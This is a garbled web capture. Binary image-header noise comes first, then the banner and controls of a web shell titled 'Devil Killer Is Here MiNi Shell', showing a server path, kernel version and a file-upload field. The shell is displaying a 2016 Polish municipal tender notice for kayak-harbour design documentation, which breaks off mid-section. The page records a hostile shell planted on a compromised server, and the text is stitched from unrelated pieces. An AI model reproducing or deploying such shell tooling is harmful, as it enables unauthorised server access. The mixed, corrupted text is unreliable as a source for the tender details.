JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/128316-N-2016.html

<p class="kh_header"><b>Kobylnica: Wykonanie pełnobranżowej dokumentacji projektowo - kosztorysowej 
w ramach przedsięwzięcia strategicznego Pomorskie Szlaki Kajakowe 
na terenie Gminy Kobylnica (Zadanie Nr 1 i Zadanie Nr 2)</b><br>
<b>Numer ogłoszenia: 128316 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobylnica , ul. Główna 20, 76-251 Kobylnica, woj. pomorskie, tel. 59 842-90-70, faks 59 842-90-72.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobylnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pełnobranżowej dokumentacji projektowo - kosztorysowej 
w ramach przedsięwzięcia strategicznego Pomorskie Szlaki Kajakowe 
na terenie Gminy Kobylnica (Zadanie Nr 1 i Zadanie Nr 2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa dot. w szczególności:
1.1	wykonania pełnobranżowej dokumentacji projektowo - kosztorysowej (w tym dokumentacji wykonawczej) w oparciu o założenia zawarte w dokumentacji przedprojektowej, niezbędnej do:
1)	wszczęcia i przeprowadzenia postępowania o udzielenie zamówienia publicznego 
na wykonanie robót budowlanych dotyczących odpowiednio:
a)	budowy przystani kajakowej przy moście Lubuń - Żelkówko (Zadanie Nr 1); 
b)	budowy przystani kajakowej za leśniczówką w miejscowości Łosino (Zadanie Nr 2);
2)	złożenia wniosku o uzyskanie dofinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014 - 2020 dla działania 8.4. Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014 - 2020 (Wsparcie atrakcyjności walorów dziedzictwa przyrodniczego);
1.2	świadczenia na każde żądanie Zamawiającego usług biegłego ds. przedmiotu i wartości zamówienia w postępowaniu o udzielenie zamówienia na wykonanie robót budowlanych, prowadzonym w oparciu o wykonaną Dokumentację wskazaną w pkt 3.1.1 SIWZ;
1.3	sprawowania nadzoru autorskiego do czasu wykonania i odbioru robót budowlanych wykonanych w oparciu o wykonaną Dokumentację wskazaną w pkt 3.1.1 SIWZ.
 

2	Szczegółowy opis przedmiotu zamówienia został określony odpowiednio dla:
1)	Zadania Nr 1 - usługa dot. wykonania Dokumentacji dla potrzeb budowy przystani kajakowej przy moście Lubuń - Żelkówko wraz ze sprawowaniem funkcji biegłego i nadzoru autorskiego - 
w Załączniku Nr 9.1A do SIWZ,
2)	Zadania Nr 2 - usługa dot. wykonania Dokumentacji dla potrzeb budowy przystani kajakowej za leśniczówką w miejscowości Łosino wraz ze sprawowaniem funkcji biegłego i nadzoru autorskiego - w Załączniku Nr 9.1B do SIWZ.
3.		Zakres przedmiotu zamówienia w ramach poszczególnych Zadań obejmuje wykonywanie obowiązków projektanta w rozumieniu art. 20 ustawy z dnia 7 lipca 1994 r. Prawo budowlane 
(t. j. Dz. U. z 2016 r., poz. 290), w tym m.in. wykonanie odrębnych pełnobranżowych dokumentacji projektowo - kosztorysowych (w tym dokumentacji wykonawczych), spełniających założenia Programu zgodnie z opisem wskazanym w szczegółowym opisie przedmiotu zamówienia (Załącznik Nr 9.1 do SIWZ) i zgodnie ze standardami technicznymi elementów infrastruktury szlaków kajakowych (wskazanych w opracowaniu pn. Koncepcji zagospodarowania szlaków wodnych województwa pomorskiego dla turystyki kajakowej rozdział 8.2: Standardy techniczne elementów infrastruktury szlaków kajakowych - Załącznik Nr 9.3 do SIWZ) oraz wytycznymi do projektowania infrastruktury wodnej (wskazanymi w opracowaniu pn. Wytyczne (modelowe, typowe) do projektowania infrastruktury wodnej dla potrzeb turystyki kajakowej - Załącznik Nr 9.4 do SIWZ) wraz z uzgodnieniem wykonanych opracowań z Zamawiającym.
4	Zakres prac projektowych w ramach poszczególnych Zadań winien obejmować w szczególności:
4.1	prace przedprojektowe, wykonane w zakresie niezbędnym do prawidłowego wykonania przedmiotu zamówienia oraz umożliwiających uzyskanie pozwolenia na budowę lub zgłoszenia rozpoczęcia robót budowlanych, poprzez:
1)	wykonanie badań geotechnicznych na potrzeby projektowanych obiektów, o ile będzie to konieczne do uzyskania wymaganych prawem decyzji;
2)	opracowanie inwentaryzacji zieleni i nasadzeń, o ile będzie to konieczne do uzyskania wymaganych prawem decyzji;
3)	uzyskanie warunków technicznych lub uzgodnień od gestorów istniejącego uzbrojenia infrastrukturalnego;
4)	opracowanie karty informacyjnej przedsięwzięcia wraz z uzyskaniem postanowienia o braku potrzeby przeprowadzenia oceny oddziaływania przedsięwzięcia na obszar NATURA 2000 lub postanowienia w sprawie uzgodnienia warunków realizacji przedsięwzięcia w zakresie oddziaływania na obszar NATURA 2000, po uprzednim opracowaniu raportu o oddziaływaniu przedsięwzięcia na obszar Natura 2000, o którym mowa w art. 97 ust. 3 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji 
o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz oceny oddziaływania na środowisko (Dz.U.2016.353), o ile będzie to konieczne (wspólnej dla Zadania Nr 1 i Nr 2);
5)	uzyskanie pozwolenia wodnoprawnego, w ramach realizacji poszczególnych Zadań,
w przypadku gdy jego uzyskanie będzie wymagane na podstawie odrębnych przepisów;
6)	wykonanie Koncepcji zagospodarowania terenu w ramach realizacji poszczególnych Zadań, które będą stanowiły po zatwierdzeniu przez Zamawiającego, podstawę do sporządzenia projektów budowlanych;
4.2	wykonanie projektów budowlanych pełnobranżowych (w tym dokumentacji wykonawczych) 
na wykonanie robót budowlanych odrębnie dla każdego Zadania w oparciu o zatwierdzone Koncepcje wraz z ich uzgodnieniem z Zamawiającym, w tym:
1)	uzyskanie wszelkich dokumentów, opinii i uzgodnień, wymaganych zgodnie 
z obowiązującymi przepisami, w tym właściwych opinii, uzgodnień rzeczoznawców, uzgodnień gestorów sieci i jednostek administracji, dodatkowych analiz i opracowań pomocniczych, w niezbędnym zakresie;
2)	wykonanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
3)	przygotowanie wniosku o pozwolenie na budowę lub na zgłoszenie rozpoczęcia robót budowlanych;
4.3	wykonanie specyfikacji technicznych wykonania i odbioru robót w zakresie wszystkich branż 	(odrębnie dla każdego Zadania) wraz z ich uzgodnieniem z Zamawiającym;
4.4	wykonanie przedmiarów robót i kosztorysów inwestorskich w zakresie wszystkich branż (odrębnie dla każdego Zadania) wraz z ich uzgodnieniem z Zamawiającym, w tym Wykonawca zobowiązany jest:
1)	sporządzić dla przedmiaru robót i kosztorysu inwestorskiego, ogólną charakterystykę obiektu lub robót, zawierającą krótki opis techniczny wraz z istotnymi parametrami, które określają wielkość robót;
2)	uzgodnić sposób podziału przedmiaru i kosztorysu inwestorskiego (w razie konieczności) dla każdego etapu realizacji;
3)	opracować przedmiary robót i kosztorysy inwestorskie z podaniem nazw i kodów określonych we Wspólnym Słowniku Zamówień zgodnym z art. 30 ust. 7 i art. 31 ust. 4 ustawy;
4)	wykonać w ramach wynagrodzenia jednorazową aktualizację każdego z opracowanych kosztorysów inwestorskich. Aktualizacja kosztorysów dokonana zostanie na pisemne zgłoszenie Zamawiającego w przypadku gdy Zamawiający będzie rozpoczynał postępowanie 
o udzielenie zamówienia na roboty budowlane po upływie 6 miesięcy od daty ustalenia przez Wykonawcę wartości zamówienia lub wystąpienia okoliczności mających wpływ na dokonane ustalenia szacowania wartości zamówienia. Kosztorysy te niezbędne będą do przeprowadzenia procedury przetargowej wyłaniającej wykonawcę robót budowlanych w oparciu o wykonane Dokumentacje.
5.	Wymagania w zakresie wykonania i odbioru Dokumentacji:
5.1	Założenia techniczne do opracowania Dokumentacji zostały określony odpowiednio dla Zadania Nr 1 w Załączniku Nr 9.1A do SIWZ i dla Zadania Nr 2 w Załączniku Nr 9.1B do SIWZ.
5.2	Dokumentacja obejmuje w szczególności:
1)	Projekty budowlane opracowane odrębnie w zakresie wszystkich branż, zgodnie 
z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej 
z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r., poz. 462 ze zm.) oraz z treścią § 4 ust. 1 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (t.j. Dz. U. z 2013 r. poz. 1129) wraz z uzyskaniem, w ramach zaoferowanej ceny wszelkich opinii, operatów (w tym operatu wodno-prawnego), raportów (w tym raportu o oddziaływaniu przedsięwzięcia na obszar Natura 2000), dokumentów, zaświadczeń, uzgodnień i sprawdzeń wymaganych zgodnie 
z obowiązującymi przepisami w zakresie pozwalającym na uzyskanie decyzji o pozwoleniu na budowę lub zgłoszeń właściwemu organowi budowy wraz z uzyskaniem braku sprzeciwu do złożonych zgłoszeń; 
2)	Projekty wykonawcze opracowane odrębnie w zakresie wszystkich branż, zgodnie 
z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (t. j. Dz. U. z 2013 r. poz. 1129), stanowiące podstawę wykonania wszystkich rodzajów robót budowlanych; 
3)	Specyfikacje techniczne wykonania i odbioru robót budowlanych, opracowane w zakresie wszystkich branż, zgodnie z rozporządzeniem Ministra Infrastruktury
z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (t. j. Dz. U. z 2013 r. poz. 1129), przez które należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, urządzeń 
i wyposażenia, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac;
4)	Przedmiary robót i kosztorysy inwestorskie sporządzone metodą uproszczoną, opracowane odrębnie w zakresie wszystkich branż (oddzielnie dla wszystkich elementów inwestycji), zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. 
w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389), w tym ogólną charakterystyką obiektu lub robót, zawierającą krótki opis techniczny 
wraz z istotnymi parametrami, które określają wielkość robót;
5)	Informację dotyczącą bezpieczeństwa i ochrony zdrowia, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia 
(Dz. U. Nr 120 poz. 1126).
5.3	Zamawiający dysponuje lub będzie dysponował następującymi materiałami wyjściowymi do projektowania, w tym:
1)	wypisem i wyrysem z MPZP odrębnie dla każdego Zadania,
2)	szczegółowym opisem przedmiotu zamówienia dot. opracowania dokumentacji odrębnie dla każdego Zadania - Załącznik Nr 9.1 do SIWZ,
3)	mapami lokalizacji przedsięwzięcia odrębnie dla każdego Zadania - Załącznik Nr 9.2 do SIWZ,
4)	Koncepcją zagospodarowania szlaków wodnych województwa pomorskiego dla turystyki kajakowej - Załącznik Nr 9.3 do SIWZ,
5)	Wytycznymi (modelowe, typowe) do projektowania infrastruktury wodnej dla potrzeb turystyki kajakowej - Załącznik Nr 9.4 do SIWZ,
6)	Koncepcją oznakowania szlaków kajakowych - Załącznik Nr 9.5 do SIWZ,
7)	Analizą wykonalności dla Przedsięwzięcia Kajakiem przez Pomorze - Załącznik Nr 9.6 
do SIWZ,
8)	mapami do celów projektowych
Uwaga:
a)	Zamawiający zlecił wykonanie map;
b)	mapy będą przekazane Wykonawcy w wersji wektorowej, tj. pliki *.dxf lub *.dwg oraz skany, tj. pliki *.pdf;
c)	Zamawiający przekaże mapy niezwłocznie po ich uzyskaniu w wersji elektronicznej, zaś w wersji papierowej nie później niż do 60 dni roboczych od dnia podpisania umowy.
5.4	Dokumentacja sporządzona odrębnie dla każdego Zadania, zostanie dostarczona Zamawiającemu:
1)	w postaci papierowej - w ilości 7 egz., z wyjątkiem projektów wykonawczych, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz przedmiaru robót, które należy dostarczyć w ilości 5 egz. oraz kosztorysu inwestorskiego, który należy dostarczyć 
w ilości 3 egz. oraz
2)	w postaci elektronicznej (płyta CD lub DVD) - w ilości 2 egz., w tym:
a)	projekty budowlane i wykonawcze: część tekstowa zapis edytowalny i pliki *.pdf, rysunki w formie plików *.dwg i *.pdf oraz załączniki i uzgodnienia w formie plików *.pdf;
b)	specyfikacje techniczne wykonania i odbioru robót: zapis edytowalny i pliki *.pdf;
c)	kosztorysy i przedmiary robót: zapis edytowalny (w standardzie plików rozpoznawalnych przez programy do kosztorysowania) i pliki *.pdf.
6.		Wymagania w zakresie świadczenia usług biegłego ds. przedmiotu i wartości zamówienia 
	w postępowaniu o udzielenie zamówienia na wykonanie robót budowlanych:
1)	występowanie w charakterze biegłego ds. przedmiotu zamówienia i jego wartości na każde wezwanie i w terminie określonym przez Zamawiającego w toku przygotowania i prowadzenia ww. postępowania;
2)	przygotowanie projektu odpowiedzi na pytania dot. przedmiotu zamówienia oraz udzielania na żądanie i w terminie określonym przez Zamawiającego ww. postępowaniu opinii w przedmiotowym zakresie;
3)	dokonywanie wszelkich zmian i uzupełnień Dokumentacji niezbędnej do wszczęcia postępowania o udzielenie zamówienia publicznego na etapie przygotowania 
i prowadzenia postępowania o udzielenie zamówienia, a także na etapie realizacji robót budowlanych, na żądanie i w terminie określonym przez Zamawiającego.
 

7.		Wymagania w zakresie sprawowania usług nadzoru autorskiego:
1)	występowanie w charakterze biegłego ds. przedmiotu zamówienia na każde wezwanie 
i w terminie określonym przez Zamawiającego, na etapie realizacji robót budowlanych;
2)	dokonywanie wszelkich zmian i uzupełnień Dokumentacji na etapie realizacji robót budowlanych, na żądanie i w terminie określonym przez Zamawiającego.
8.	Szczegółowy opis przedmiotu zamówienia zawarto w SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy w wysokości do 30% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.20.00-6, 71.24.40.00-0, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał należycie (zakończył) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	co najmniej jedną usługę (umowę) polegającą na wykonaniu dokumentacji projektowej dotyczącą budowy terenów rekreacyjnych oraz
b)	co najmniej jedną usługę (umowę) polegającą na wykonaniu dokumentacji projektowej dotyczącą budowy lub przebudowy pomostu, kładki lub mostu o konstrukcji drewnianej,
lub przedstawi pisemne zobowiązania innych podmiotów do oddania mu do dyspozycji 
ww. wiedzy i doświadczenia;
Uwaga:
Wyżej wymienione usługi (umowy) mogą być wykonane w ramach jednego lub odrębnych zamówień</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.: 
1)	co najmniej 1 osobą (projektantem) posiadającym uprawnienia bez ograniczeń do projektowania w specjalności architektonicznej oraz
2)	co najmniej 1 osobą (projektantem) posiadającym uprawnienia bez ograniczeń 
do projektowania w specjalności konstrukcyjno-budowlanej oraz
3)	co najmniej 1 osobą (projektantem) posiadającym uprawnienia bez ograniczeń 
do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych
lub wykaże, że będzie dysponował w/w osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w realizacji zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.2 ogłoszenia, zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
